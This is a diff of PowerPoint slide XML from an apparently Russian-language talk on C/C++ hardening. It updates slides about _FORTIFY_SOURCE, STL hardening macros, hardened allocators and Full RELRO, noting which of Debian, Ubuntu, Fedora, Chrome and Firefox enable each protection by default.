+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Включена по умолчанию в компиляторе </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Ubuntu GCC (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-D_FORTIFY_SOURCE=3</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Не включена в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Debian </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
@@ -35451,60 +35893,135 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Clang)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Libc++: -D_LIBCPP_HARDENING_MODE=...</a:t>
-            </a:r>
+              <a:t>Fedora</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>включается в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Clang </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>по флагу </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Для </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Clang</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> не включена по умолчанию нигде</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Использование в реальных проектах</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>В </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Debian </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>пакеты дефолтно собираются с </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
               <a:t>-</a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>stdlib</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>=libc++)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Visual Studio: -D_ITERATOR_DEBUG_LEVEL=1</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>По умолчанию не включена в компиляторах в дистрибутивах </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Debian, Ubuntu </a:t>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>D_FORTIFY_SOURCE=2</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>В </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Ubuntu </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>с </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>D_FORTIFY_SOURCE=3</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>В </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Fedora: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>пакеты дефолтно собираются с </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>D_FORTIFY_SOURCE=3</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>с 2023</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Chrome </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
@@ -35512,59 +36029,19 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Fedora</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Использование в реальных проектах:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Включена по умолчанию для пакетов </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Fedora, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>но не для </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Debian </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>и </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Ubuntu</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Google: Chrome and server systems</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="2"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId2"/>
-              </a:rPr>
-              <a:t>Retrofitting spatial safety to hundreds of millions of lines of C++</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
+              <a:t>Firefox </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>собираются с </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-D_FORTIFY_SOURCE=2</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -35573,7 +36050,7 @@
           <p:cNvPr id="4" name="Slide Number Placeholder 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA74AC83-3417-44E3-8294-3A7D59F0DCBA}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2953379-E1A6-429C-9D89-03490548E8EF}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -35600,7 +36077,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3217243489"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1952923550"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -35632,7 +36109,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E792084D-322A-4CB9-A936-45119E748D0D}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88930F68-01D6-4DFC-8C4B-096056195DAD}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -35650,15 +36127,15 @@
           <a:p>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Hardened allocators: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Как включить </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>?</a:t>
+              <a:t>STL hardening: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Как включить</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> ?</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -35668,7 +36145,7 @@
           <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{383FC83D-DCD4-4DBF-AB24-B5AB31F5E207}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDEFA53E-F74E-4729-8A65-412D2CAD0540}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -35682,64 +36159,111 @@
         <p:spPr/>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit/>
+            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>О</a:t>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Libstdc++:</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> -</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>D_GLIBCXX_ASSERTIONS</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>(дефолтная </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>STL </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>GCC </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Clang)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Libc++: -D_LIBCPP_HARDENING_MODE=...</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>включается в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Clang </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>по флагу </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>-</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>бычно</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>просто </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>LD_PRELOAD=path/to/allocator.so</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Проверки в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Glibc </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>включаются по </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>MALLOC_CHECK_=3 </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>или </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>GLIBC_TUNABLES=</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>glibc.malloc.check</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>=3</a:t>
-            </a:r>
+              <a:t>stdlib</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>=libc++)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Visual Studio: -D_ITERATOR_DEBUG_LEVEL=1</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>По умолчанию не включена в компиляторах в дистрибутивах </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Debian, Ubuntu </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Fedora</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
           </a:p>
           <a:p>
             <a:r>
@@ -35751,63 +36275,35 @@
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Большинство дистрибутивов </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Linux </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>используют </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Glibc</a:t>
+              <a:t>Включена по умолчанию для пакетов </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Fedora, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>но не для </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Debian </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Ubuntu</a:t>
             </a:r>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Android </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>использует </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Scudo </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>по дефолту</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Chrome </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>использует</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> hardened-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>аллокатор </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>PartitionAlloc</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
+              <a:t>Google: Chrome and server systems</a:t>
+            </a:r>
           </a:p>
           <a:p>
             <a:pPr lvl="2"/>
@@ -35815,53 +36311,8 @@
               <a:rPr lang="en-US" dirty="0">
                 <a:hlinkClick r:id="rId2"/>
               </a:rPr>
-              <a:t>Efficient And Safe Allocations Everywhere!</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Firefox </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>использует</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>не-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>hardened </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>аллокатор</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> :(</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="2"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId3"/>
-              </a:rPr>
-              <a:t>Firefox and Chromium: Memory Allocator Hardening</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
+              <a:t>Retrofitting spatial safety to hundreds of millions of lines of C++</a:t>
+            </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
@@ -35871,7 +36322,7 @@
           <p:cNvPr id="4" name="Slide Number Placeholder 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57A5120B-FAAA-4EA3-9261-D059D90B41ED}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA74AC83-3417-44E3-8294-3A7D59F0DCBA}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -35898,7 +36349,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2015695599"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3217243489"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -35930,7 +36381,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24F65176-1DCF-40BE-BC3B-1D07413D3E26}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E792084D-322A-4CB9-A936-45119E748D0D}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -35948,15 +36399,15 @@
           <a:p>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Full RELRO: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Как включить</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> ?</a:t>
+              <a:t>Hardened allocators: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Как включить </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>?</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -35966,7 +36417,7 @@
           <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B75EE06-796F-4150-9967-C80D9D14B36F}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{383FC83D-DCD4-4DBF-AB24-B5AB31F5E207}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -35986,156 +36437,180 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Опции линкера для включения </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Full RELRO:</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>О</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>бычно</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
               <a:t> </a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-Wl,-z,now -Wl,-z,relro</a:t>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>просто </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>LD_PRELOAD=path/to/allocator.so</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Проверки в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Glibc </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>включаются по </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>MALLOC_CHECK_=3 </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>или </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>GLIBC_TUNABLES=</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>glibc.malloc.check</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>=3</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Использование в реальных проектах:</a:t>
             </a:r>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>В Ubuntu включены по умолчанию в GCC, но не в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Clang (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Clang </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>только </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>partial RELRO</a:t>
+              <a:t>Большинство дистрибутивов </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Linux </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>используют </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Glibc</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Android </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>использует </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Scudo </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>по дефолту</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Chrome </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>использует</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> hardened-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>аллокатор </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>PartitionAlloc</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="2"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>Efficient And Safe Allocations Everywhere!</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Firefox </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>использует</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>не-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>hardened </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>аллокатор</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> :(</a:t>
             </a:r>
             <a:endParaRPr lang="ru-RU" dirty="0"/>
           </a:p>
           <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
